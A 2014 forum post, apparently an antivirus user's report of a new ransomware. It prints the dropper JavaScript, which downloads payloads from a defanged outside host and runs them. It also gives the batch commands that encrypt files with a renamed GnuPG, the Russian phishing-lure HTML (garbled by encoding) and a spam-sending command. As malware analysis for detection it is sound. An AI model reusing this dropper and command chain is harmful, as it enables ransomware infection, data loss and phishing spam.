JAMEWT 4 Posted August 8, 2014 Share Posted August 8, 2014 (edited) From 2014/08/05 there is this new RansomWare At 2014/08/06 i have sent you sample and you have add detection and block download of the zip file but eset not detect btc file https://www.virustotal.com/it/file/37c73b3d6ba7d96cbf387f4436f6a2262af14b84f9c0a218fde1b28db5edd23f/analysis/ ********************************************************************************************************** ESET Malware Response Team have the file from 2014/08/0606/08/2014 20:05:16 Kernel ESET Il file 'D:\A MALWARE\keybtc.btc' è stato inviato a ESET per l'analisi.***************************************************************************** I EXPLAIN This *.JS file after execute it download a lot of files and do a lot of work .. Information thank to @MalwareHunter (malwaretips.com) JS file ////////// autoreplicant bot //////////////////////////// var intoxicated twice ////////////////var nosensetoblock="collapseit.com",tfolder="%TEMP%\\",WshShell=WScript.CreateObject("WScript.Shell");function autoreply(c,d){var b=new ActiveXObject("MSXML2.XMLHTTP");b.onreadystatechange=function(){if(4===b.readyState){var a=new ActiveXObject("ADODB.Stream");a.open();a.type=1;a.write(b.ResponseBody);a.position=0;a.saveToFile(d,2);a.close()}};b.open("GET",c,!1);b.send()}var genesis="%TEMP%\\keybtc.cmd",autorotatedomain="images";function CreateObject©{return new ActiveXObject©}var WshShell=CreateObject("WScript.Shell"),tfolder=WshShell.ExpandEnvironmentStrings(tfolder),docrun="%TEMP%\\document.doc";try{autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/document.btc",""+tfolder+"document.doc"),WshShell.Run(""+docrun+"",1,0)}catch(docs){}autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/day.btc",""+tfolder+"day.btc");autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/null.btc",""+tfolder+"null.btc");autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/sad.btc",""+tfolder+"sad.btc");autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/keybtc.btc",""+tfolder+"keybtc.cmd");WshShell.Run(""+genesis+"",0,0); Ok download this file hXXp://collapseit.com/images/sad.btc-MD5: e189b5ce11618bb7880e9b09d53a588fhttps://www.virustotal.com/it/file/97d27e1225b472a63c88ac9cfb813019b72598b9dd2d70fe93f324f7d034fb95/analysis/1406556814/hxxp://collapseit.com/images/null.btc-MD5: 778232ba5aa586021a27ec2bf4e7b99ahttps://www.virustotal.com/it/file/c201989c78d9f8a8c8a18577b3deb6baf71fbc13594e545015ba96d69da724dc/analysis/1407318858/hxxp://collapseit.com/images/day.btc-MD5: 352369b32c971e1a7f56ef29593abb44https://www.virustotal.com/it/file/1e56cc30ea50c74c6795a9aed142ad5e5fd51ddc17080f948cb23d647c5b8553/analysis/1407196678/hxxp://collapseit.com/images/document.btc-MD5: 50a561c0d0f0c49974dfb15763f73202https://www.virustotal.com/it/file/62a86e1ba6b2d629ec54822c1ca16ef995cd9f18965f03fa918486f2f3795192/analysis/1407320991/hxxp://collapseit.com/images/keybtc.btc-MD5: 3ca63d203556c63d5e0c06d78f6aae4chttps://www.virustotal.com/it/file/37c73b3d6ba7d96cbf387f4436f6a2262af14b84f9c0a218fde1b28db5edd23f/analysis/1407331101/ after execute keybtc.btc (after drop: keybtc.cmd) C:\Users\%UserName%\AppData\Local\Temp>echo Key-Type: RSA 1>genrsa.btcC:\Users\%UserName%\AppData\Local\Temp>echo Key-Length: 1024 1>>genrsa.btcC:\Users\%UserName%\AppData\Local\Temp>echo Name-Real: genesis 1>>genrsa.btcC:\Users\%UserName%\AppData\Local\Temp>echo Name-Comment: keybtc@gmail.com 1>>genrsa.btcC:\Users\%UserName%\AppData\Local\Temp>echo Name-Email: keybtc@gmail.com 1>>genrsa.btcC:\Users\%UserName%\AppData\Local\Temp>echo -----BEGIN PGP PUBLIC KEY BLOCK----- 1>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo Version: GnuPG v1 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo.1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo mQENBFPgfZQBCACwmI/ra8/PJnw1YAvQZ8mszyEtIfJ4GA2jTM3ih9qCWMRb3cCI 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo heeVFaBTyAp33AP0EGjRDcg7E4VihowO2zCqJa7QkEfxVLwYKbEiEEnns4VDNnut 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo eOsyHF/ZyiNshYUN3Fj+YiFMtOzEUcJEE0QuUfl2o0Ajl9BRz3cQPPSnUhKS/vmc 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo Fut1Y5GcJVWhjl4f51Grp1Q5lB9ndqCVGpG7PZ7tqQgA6934DOjGQQF3BK9ZuSJq 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo v4bMKs12cOndOIFuoim/KV5NL4wXlUes7GIlTp4P3izlobNlVfYKXgS4Vc/H/FiA 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo YVOaB7L4rVXwc7oixYSI1a4TwqXfifDhJNSRABEBAAG0ImtleWJ0YyAoa2V5YnRj 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo KSA8a2V5YnRjQGdtYWlsLmNvbT6JATgEEwECACIFAlPgfZQCGwMGCwkIBwMCBhUI 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo AgkKCwQWAgMBAh4BAheAAAoJEIUsFvyqtih1ly4IAJlYEiJX2VeXV77c8M/0PRtN 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo XAGmgFjt9WNvnMGlvAY88/QUMwMU9XV2gXTc+KiLacuagofhGpHOuZf3suSBYMDS 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo oi135YTGs1sAWOx2kBwmyW8rrNLZ84V4wa97I9nEbzIYB0thzr3euu0QTz78hj2v 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo Gai2uA82F45XFcjXhPKINbSgMCYIpbhfjUCMbSVy8+3rF9fUDWICVwzAof467GOI 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo b4SKcDkX5IOzDugDnKXvKwDNr9fcomZhhVUz5djF1TTORc0qXQye2GiFa6ZtE4aH 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo WFw6hKfBIgaJGFIqnr7be0Di1duWisnCYS2n9/VDcZpeOpv7uqc78KDJ+Ogm27W5 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo AQ0EU+B9lAEIAMcXK4tuglxptwQKg4aODX8OnSbAyAQW5QHTK9d4GG40vry8IJVx 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo pUYe7fgax7OIkKLnYjo0uNXnBD70e3Z80WhDK1/2eIC4MxqVAD4cKP2yKZOFLKi2 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo BJ7BdYk+y4d2MgqGuGIt84Wp0Zrcs1O32pS2lXfaBxjREaAUuqzy4MU0AJ5+5tK0 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo qeD1OTxJhYivIky/qrmDtMf0G/WzxULV1iy0pkDP/s44KmsQxept3MzmCMgdAXmg 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo 2ANdP5r+UOglQeLKBmyLhCAcNqvHPU5I2X5qWmAbU0Z8IT/M1m/SE0/r9VF63C+Y 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo g3HQQDVZYOFWqi2uHOoU/LZ157kgF5gYqNUAEQEAAYkBHwQYAQIACQUCU+B9lAIb 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo DAAKCRCFLBb8qrYodQp3B/0SeVJOLU+3gmq+R7VLqNbeS6NZ9KnZQvda3vyE0/+t 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo FGx3Xo6Gf4chi+hTY33Ph+/4xA0cFg3i2YDSZRunDKG3OavrRDIpF6SNIH/X/sPU 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo IQxATi1Sq/EmNzJdAqqqYNQT7YlWyVjI2pLcbberET+9LHIMcatnQ08GZQDViiSI 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo o7fW4sVYMgnRS5OXOwzMqW7wLuLbIGuTZQXTIOAoOhuZtfmy5woCRwF9sygYu5yw 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo iwQkX2P/Ffzwrpu92J8uqoVeUXdBV8bgnK92KKKi/F4czak/DLa453cLlwozPxSv 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo 6/RKzQXVaopzuOdvdRTwKSb+mFr+gsMlQ1t7xNcMdW84 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo =yxjK 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo -----END PGP PUBLIC KEY BLOCK----- 1>>2048key.btc C:\Users\%UserName%\AppData\Local\Temp\svchost.exe" -r keybtc --yes --trust-model always --no-verbose -q --encrypt-files "C:\Users\%UserName%\AppData\Local\Temp\secring.gpg" (Remark: svchost.exe is the dropped null.btc after renaming.) (Create another JS files) C:\Users\%UserName%\AppData\Local\Temp>echo var earthlingsfilm="collapseit.com",WshShell=WScript.CreateObject("WScript.Shell");function touchdown(c,d){var b=new ActiveXObject("MSXML2.XMLHTTP");b.onreadystatechange=function(){if(4===b.readyState){var a=new ActiveXObject("ADODB.Stream");a.open();a.type=1;a.write(b.ResponseBody);a.position=0;a.saveToFile(d,2);a.close()}};b.open("GET",c,!1);b.send()}var genesis="autoreplicant";touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/coherence.btc","coherence.btc"); 1>autoreplicant.jsC:\Users\%UserName%\AppData\Local\Temp>echo touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/lsass.btc","lsass.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/spool.btc","spool.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/spoolsv.btc","spoolsv.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/sv.btc","sv.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/tobi.btc","tobi.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/collapse.btc","collapse.btc"); 1>>autoreplicant.js Also creates html (filename: ltr*.html) files with links like this: hxxp://bit.ly/invoice2014- (eset block all download) C:\Users\%UserName%\AppData\Local\Temp>echo var earthlingsfilm="collapseit.com",WshShell=WScript.CreateObject("WScript.Shell");function touchdown(c,d){var b=new ActiveXObject("MSXML2.XMLHTTP");b.onreadystatechange=function(){if(4===b.readyState){var a=new ActiveXObject("ADODB.Stream");a.open();a.type=1;a.write(b.ResponseBody);a.position=0;a.saveToFile(d,2);a.close()}};b.open("GET",c,!1);b.send()}var genesis="autoreplicant";touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/coherence.btc","coherence.btc"); 1>autoreplicant.jsC:\Users\%UserName%\AppData\Local\Temp>echo touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/lsass.btc","lsass.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/spool.btc","spool.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/spoolsv.btc","spoolsv.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/sv.btc","sv.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/tobi.btc","tobi.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/collapse.btc","collapse.btc"); 1>>autoreplicant.jsC:\Users\%UserName%\AppData\Local\Temp>copy /b "C:\Users\%UserName%\AppData\Local\Temp\collapse.btc" + "C:\Users\%UserName%\AppData\Local\Temp\tobi.btc" ttl.exeC:\Users\%UserName%\AppData\Local\Temp>del /f /q tobi.btc & del /f /q collapse.btcC:\Users\%UserName%\AppData\Local\Temp>RENAME lsass.btc lsass.exeC:\Users\%UserName%\AppData\Local\Temp>RENAME coherence.btc coherence.exeC:\Users\%UserName%\AppData\Local\Temp>RENAME spoolsv.btc spoolsv.exeC:\Users\%UserName%\AppData\Local\Temp>RENAME spool.btc blat.libC:\Users\%UserName%\AppData\Local\Temp>RENAME sv.btc blat.dllC:\Users\%UserName%\AppData\Local\Temp>ttl.exe -f ttl.pwdC:\Users\%UserName%\AppData\Local\Temp>taskkill /f /im 1Cv8N.exeC:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\autoreplicant.js" (Remark: These *.btc files dropped by the second js file autoreplicant.js .) C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr1.htmlC:\Users\%UserName%\AppData\Local\Temp>echo ЗдN€Ð°Ð?NN‚Ð?N?ÐaN‚е,<br> 1>>ltr1.htmlC:\Users\%UserName%\AppData\Local\Temp>echo КаÐs и дÐlÐlÐlÐ?аN€Ð¸Ð?алиNNS N Ð?аN?иÐL N€N?ÐsÐlÐ?ÐlдNN‚Ð?ÐlÐL, ÐzеN€ÐµNN‹Ð»Ð°NŽ ВаÐL NN‡ÐµN‚ длNZ ÐlÐzлаN‚N‹ (Ð?Ðl Ð?лÐlжеÐ?ии). ОN€ÐlаÐ?изN?ÐaN‚е, ÐzÐlжалN?ÐaNN‚а, ÐzлаN‚еж.<br> 1>>ltr1.htmlC:\Users\%UserName%\AppData\Local\Temp>echo КÐlÐlда бN?N…ÐlалN‚еN€Ð¸NZ Ð?Nе ÐzN€ÐlÐ?едеN‚, ÐlN‚ÐzиN?иN‚еNNS ÐLÐ?е - NZ ÐzN€ÐlÐ?еN€NŽ ÐzN€Ð¸N…Ðlд деÐ?еÐl. <br> 1>>ltr1.htmlC:\Users\%UserName%\AppData\Local\Temp>echo ДÐlÐlÐlÐ?ÐlN€ N? ВаN иÐLееN‚NNZ? Ð?ли ÐLÐ?е Ð?N‹NлаN‚NS ÐsÐlÐzиNŽ? <br><br> 1>>ltr1.htmlC:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr1.htmlC:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/invoice2014">Ð?N‡ÐµN‚_длNZ_ÐlÐzлаN‚N‹ (аÐ?Ðl.).zip</a> 1>>ltr1.htmlC:\Users\%UserName%\AppData\Local\Temp>set RND0=22361C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr2.htmlC:\Users\%UserName%\AppData\Local\Temp>echo ÐtаN?и бN?N…ÐlалN‚еN€Ð° ÐzÐlÐzN€ÐlNили ÐzеN€ÐµNлаN‚NS ВаÐL NN‡ÐµN‚ Ð?Ф-14-22361 (NÐL. ÐzN€Ð¸Ð»ÐlжеÐ?ие).<br>Ð’N‹ ÐLÐlÐlли бN‹ N?зÐ?аN‚NS, бN‹Ð»Ð° ли ÐzÐl Ð?еÐLN? ÐlÐzлаN‚а?<br>ÐzÐl даÐ?Ð?N‹ÐL Ð?аN?еÐa базN‹ ÐzÐl NTN‚ÐlÐLN? ÐzлаN‚ежN? за ВаÐLи Ð?иNиN‚ дÐlлÐl. Ð’ÐlзÐLÐlжÐ?Ðl, ÐsаÐsаNZ-N‚Ðl ÐlN?ибÐsа.<br>ÐzN€ÐlÐ?еN€NSN‚е, ÐzÐlжалN?ÐaNN‚а.<br><br> 1>>ltr2.htmlC:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr2.htmlC:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/invoice142014">Ð?N‡ÐµN‚ Ð?Ф-14-22361_2014.zip</a> 1>>ltr2.htmlC:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr3.htmlC:\Users\%UserName%\AppData\Local\Temp>echo ÐLÐ?ажаеÐLN‹Ðµ ÐsÐlллеÐlи, <br> 1>>ltr3.htmlC:\Users\%UserName%\AppData\Local\Temp>echo ÐsN‹ ÐzN€ÐlÐ?ÐlдиÐL ежеÐLеNNZN‡Ð?N?NŽ NÐ?еN€ÐsN?. Ð’ ÐzN€Ð¸Ð»ÐlжеÐ?ии - ÐzN€ÐlеÐsN‚ ÐÐsN‚а ÐzÐl ВаN?еÐLN? ÐzN€ÐµÐ´ÐzN€Ð¸NZN‚иNŽ.<br>Ð?аÐL ÐzÐlлN?N‡Ð°ÐµN‚NNZ дÐlлÐl ÐzN€Ð¸ÐLеN€Ð?Ðl Ð?а 10 N‚N‹N. ÐzN€ÐlÐ?еN€NSN‚е ÐzÐl NÐ?ÐlиÐL базаÐL, Ð?Nе ли ÐzN€Ð°Ð?илNSÐ?Ðl. <br> 1>>ltr3.htmlC:\Users\%UserName%\AppData\Local\Temp>echo ЖдN? ÐlN‚Ð?еN‚а, NÐzаNибÐl. <br><br> 1>>ltr3.htmlC:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr3.htmlC:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/revise2014">ÐzN€ÐlеÐsN‚ ÐÐsN‚а NÐ?еN€Ðsи-2014.zip</a> 1>>ltr3.htmlC:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr4.htmlC:\Users\%UserName%\AppData\Local\Temp>echo ЗдN€Ð°Ð?NN‚Ð?N?ÐaN‚е,<br> 1>>ltr4.htmlC:\Users\%UserName%\AppData\Local\Temp>echo ÐtаN?а бN?N…ÐlалN‚еN€Ð¸NZ ÐzN€ÐlÐ?еN€Ð¸Ð»Ð° ÐlÐzлаN‚N? ÐzÐl NN‚аN€N‹ÐL ÐzÐlNN‚аÐ?ÐsаÐL. <br> 1>>ltr4.htmlC:\Users\%UserName%\AppData\Local\Temp>echo К ÐzиNNSÐLN? ÐzN€Ð¸Ð»ÐlжеÐ?а ÐsÐlÐzиNZ ÐÐsN‚а NÐ?еN€Ðsи ÐzÐl ВаN?еÐLN? ÐzN€ÐµÐ´ÐzN€Ð¸NZN‚иNŽ. Ð?ÐlÐlлаNÐ?Ðl Ð?аN?еÐa иÐ?N„ÐlN€ÐLаN†Ð¸Ð¸ Ð’N‹ Ð?аÐL Ð?еÐLÐ?ÐlÐlÐl Ð?едÐlÐzлаN‚или ÐzÐl дÐ?N?ÐL NN‡ÐµN‚аÐL.<br> 1>>ltr4.htmlC:\Users\%UserName%\AppData\Local\Temp>echo ÐzN€ÐlÐ?еN€NSN‚е N?ÐsазаÐ?Ð?N‹Ðµ даÐ?Ð?N‹Ðµ, ÐzÐlжалN?ÐaNN‚а. <br><br> 1>>ltr4.htmlC:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr4.htmlC:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/revisecopy2014">КÐlÐzиNZ ÐÐsN‚а NÐ?еN€Ðsи (2014).zip</a> 1>>ltr4.htmlC:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr5.htmlC:\Users\%UserName%\AppData\Local\Temp>echo ДеÐ?NS дÐlбN€N‹Ða, <br> 1>>ltr5.htmlC:\Users\%UserName%\AppData\Local\Temp>echo ÐsN‹ ÐzN€ÐlÐzлаN‚или ÐzÐl ВаN?еÐLN? NN‡ÐµN‚N? (NÐsаÐ?-ÐsÐlÐzиNZ ÐzлаN‚ежÐ?ÐlÐlÐl ÐzÐlN€N?N‡ÐµÐ?иNZ Ð? аN‚N‚аN‡Ðµ). ÐzN€ÐlÐ?еN€NSN‚е ÐzN€Ð¸N…Ðlд деÐ?еÐl и ÐlN‚ÐzиN?иN‚еNNS.<br>ÐtадеNŽNNS, N N€ÐµÐsÐ?изиN‚аÐLи Ð?Nе Ð?ÐlN€ÐLалNSÐ?Ðl. <br><br> 1>>ltr5.htmlC:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr5.htmlC:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/scancopy2014">CÐsаÐ?-ÐsÐlÐzиNZ ÐzлаN‚ежÐ?ÐlÐlÐl ÐzÐlN€N?N‡ÐµÐ?иNZ.zip</a> 1>>ltr5.htmlC:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr6.htmlC:\Users\%UserName%\AppData\Local\Temp>echo ÐtаN?а бN?N…ÐlалN‚еN€Ð¸NZ ÐzN€ÐlÐ?ела ÐzлаN‚еж ÐzÐl ВаN?еÐLN? NN‡ÐµN‚N? (ÐzлаN‚ежÐsа N ÐlN‚ÐLеN‚ÐsÐlÐa баÐ?Ðsа Ð?Ðl Ð?лÐlжеÐ?ии). ÐzÐlNÐLÐlN‚N€Ð¸N‚е, ÐzN€Ð¸N?ли ли деÐ?NSÐlи. ЖдN? ÐlN‚Ð?еN‚а, NÐzаNибÐl. <br><br> 1>>ltr6.htmlC:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr6.htmlC:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/payment20143991">ÐzлаN‚ежÐsа_ÐlN‚ÐLеN‚Ðsа баÐ?Ðsа (aug).zip</a> 1>>ltr6.htmlC:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr7.htmlC:\Users\%UserName%\AppData\Local\Temp>echo ÐzеN€ÐµNN‹Ð»Ð°NŽ ВаÐL ÐÐsN‚N‹ ÐzN€Ð¸ÐµÐLа-ÐzеN€ÐµÐ´Ð°N‡Ð¸ ÐzÐl ДÐlÐlÐlÐ?ÐlN€N? ÐlN‚ 02.08.2014 ÐlÐlда (Ð?Ðl Ð?лÐlжеÐ?ии). ÐzÐlNÐLÐlN‚N€Ð¸N‚е, Ð?Nе ли N‚аÐL Ð?ÐlN€ÐLалNSÐ?Ðl ÐzÐl NÐlдеN€Ð¶Ð°Ð?иNŽ. ЕNли N‡N‚Ðl, ÐLN‹ NÐl NÐ?ÐlеÐa NN‚ÐlN€ÐlÐ?N‹ ÐzÐlдÐzиNN‹Ð?аеÐL дÐlÐsN?ÐLеÐ?N‚N‹ и Ð?N‹NN‹Ð»Ð°ÐµÐL ВаÐL ÐlN€Ð¸ÐlиÐ?алN‹. <br><br> 1>>ltr7.htmlC:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr7.htmlC:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/recandtransmiss2014">ÐÐsN‚N‹ ÐzN€Ð¸ÐµÐLа-ÐzеN€ÐµÐ´Ð°N‡Ð¸.zip</a> 1>>ltr7.htmlC:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr8.htmlC:\Users\%UserName%\AppData\Local\Temp>echo ÐtаN?а бN?N…ÐlалN‚еN€Ð¸NZ Ð?е ÐLÐlжеN‚ Ð?аÐaN‚и Ð?еNÐsÐlлNSÐsÐl ÐÐsN‚ÐlÐ? ÐzN€Ð¸ÐµÐLа-ÐzеN€ÐµÐ´Ð°N‡Ð¸ ÐzÐl дÐlÐlÐlÐ?ÐlN€Ð°ÐL, заÐsлNŽN‡ÐµÐ?Ð?N‹ÐL N ВаÐLи.<br>ÐzN€ÐlблеÐLа Ð? N‚ÐlÐL, N‡N‚Ðl N? Ð?аN NÐl дÐ?NZ Ð?а деÐ?NS дÐlлжÐ?а Ð?аN‡Ð°N‚NSNNZ ÐzN€ÐlÐ?еN€Ðsа ФÐtÐ?.<br>ÐsÐlжеN‚е ÐzÐlNÐLÐlN‚N€ÐµN‚NS, еNN‚NS ли N? ВаN ÐlN€Ð¸ÐlиÐ?алN‹ NTN‚иN… дÐlÐsN?ÐLеÐ?N‚ÐlÐ? (NÐsаÐ?N‹ Ð?Ðl Ð?лÐlжеÐ?ии)?<br> 1>>ltr8.htmlC:\Users\%UserName%\AppData\Local\Temp>echo ÐzN€ÐlN?N? ÐlN‚Ð?еN‚иN‚NS ÐLаÐsNиÐLалNSÐ?Ðl ÐlÐzеN€Ð°N‚иÐ?Ð?Ðl. Ð?ÐzаNибÐl. <br><br> 1>>ltr8.htmlC:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr8.htmlC:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/rectrans2014">ÐÐsN‚N‹ ÐzÐl ÐzN€Ð¸ÐµÐLN?-ÐzеN€ÐµÐ´N‡Ð¸_2014Ðl.zip</a> 1>>ltr8.htmlC:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr9.htmlC:\Users\%UserName%\AppData\Local\Temp>echo ЗдN€Ð°Ð?NN‚Ð?N?ÐaN‚е,<br> 1>>ltr9.htmlC:\Users\%UserName%\AppData\Local\Temp>echo Ð’ NÐ?NZзи N изÐLеÐ?еÐ?иNZÐLи Ð? N†ÐµÐ?ÐlÐ?ÐlÐa ÐzÐlлиN‚иÐsе Ð?аN?еÐa ÐsÐlÐLÐzаÐ?ии, ÐLN‹ N€Ð°Ð·N€Ð°Ð±ÐlN‚али N‚иÐzÐlÐ?Ðlе дÐlÐzÐlлÐ?иN‚елNSÐ?Ðlе NÐlÐlлаN?еÐ?ие длNZ ÐzÐlдÐzиNаÐ?иNZ N Ð?аN?иÐLи аÐsN‚N?алNSÐ?N‹ÐLи ÐsÐlÐ?N‚N€Ð°ÐlеÐ?N‚аÐLи.<br>ОзÐ?аÐsÐlÐLNSN‚еNNS N дÐlÐsN?ÐLеÐ?N‚ÐlÐL Ð? ÐzN€Ð¸Ð»ÐlжеÐ?ии и ÐlN‚Ð?еN‚NSN‚е ÐzÐl ÐlÐlN‚ÐlÐ?Ð?ÐlNN‚и ÐzÐlдÐzиNаÐ?иNZ. <br> 1>>ltr9.htmlC:\Users\%UserName%\AppData\Local\Temp>echo Ð’ NлN?N‡Ð°Ðµ Ð?еÐlбN…ÐlдиÐLÐlNN‚и, ÐLN‹ ÐlÐlN‚ÐlÐ?N‹ N€Ð°NNÐLÐlN‚N€ÐµN‚NS ВаN?и ÐzN€Ð°Ð?Ðsи. <br> 1>>ltr9.htmlC:\Users\%UserName%\AppData\Local\Temp>echo Ð?ÐzаNибÐl. <br><br> 1>>ltr9.htmlC:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr9.htmlC:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/supplementaryagr3381">Ð?иÐzÐlÐ?Ðlе дÐlÐz.NÐlÐlлаN?еÐ?ие.zip</a> 1>>ltr9.htmlC:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr10.htmlC:\Users\%UserName%\AppData\Local\Temp>echo ДеÐ?NS дÐlбN€N‹Ða, <br> 1>>ltr10.htmlC:\Users\%UserName%\AppData\Local\Temp>echo Ð’ ÐzN€ÐlдÐlлжеÐ?ие ÐzеN€ÐµÐlÐlÐ?ÐlN€ÐlÐ? N Ð?аN?иÐL диN€ÐµÐsN‚ÐlN€ÐlÐL, Ð?аÐzN€Ð°Ð?лNZNŽ ВаÐL длNZ N€Ð°NNÐLÐlN‚N€ÐµÐ?иNZ ÐzN€ÐlеÐsN‚ дÐlÐlÐlÐ?ÐlN€Ð° (Ð? ÐzN€Ð¸Ð»ÐlжеÐ?ии). ОзÐ?аÐsÐlÐLNSN‚еNNS N дÐlÐsN?ÐLеÐ?N‚ÐlÐL.<br>ÐzN€ÐlNNSба иNÐzN€Ð°Ð?леÐ?иNZ Ð?Ð?ÐlNиN‚NS Ð? N€ÐµÐ¶Ð¸ÐLе ÐzN€Ð°Ð?ÐlÐs.<br><br>Ð?ÐzаNибÐl<br><br> 1>>ltr10.htmlC:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr10.htmlC:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/draft77182">ÐzN€ÐlеÐsN‚ дÐlÐlÐlÐ?ÐlN€Ð° (2014Ðl).zip</a> 1>>ltr10.htmlecho spoolsv.exe ltr!R!.html -server smtp.mail.ru -port 587 -f !validmail! -u !validmail! -pw !Spamail! -priority 1 -sensitivity 2 -noh -noh2 -ss -html -to %a 1>>readbook.cmd ) *There are some more commands like this. It seems that this script sends spams also... And finally... delete a lot of files and link C:\Users\%UserName%\AppData\Roaming>del /f /q "C:\Users\%UserName%\AppData\Roaming\gnupg\*.*"C:\Users\%UserName%\AppData\Roaming>rmdir /s /q "C:\Users\%UserName%\AppData\Roaming\gnupg"C:\Users\%UserName%\AppData\Roaming>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\sdelete.exe"C:\Users\%UserName%\AppData\Roaming>start hxxp://bit.ly/keybtcC:\Users\%UserName%\AppData\Roaming>cd "C:\Users\%UserName%\AppData\Local\Temp"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\pubring.bak"C:\Users\%UserName%\AppData\Local\Temp>del /f /q 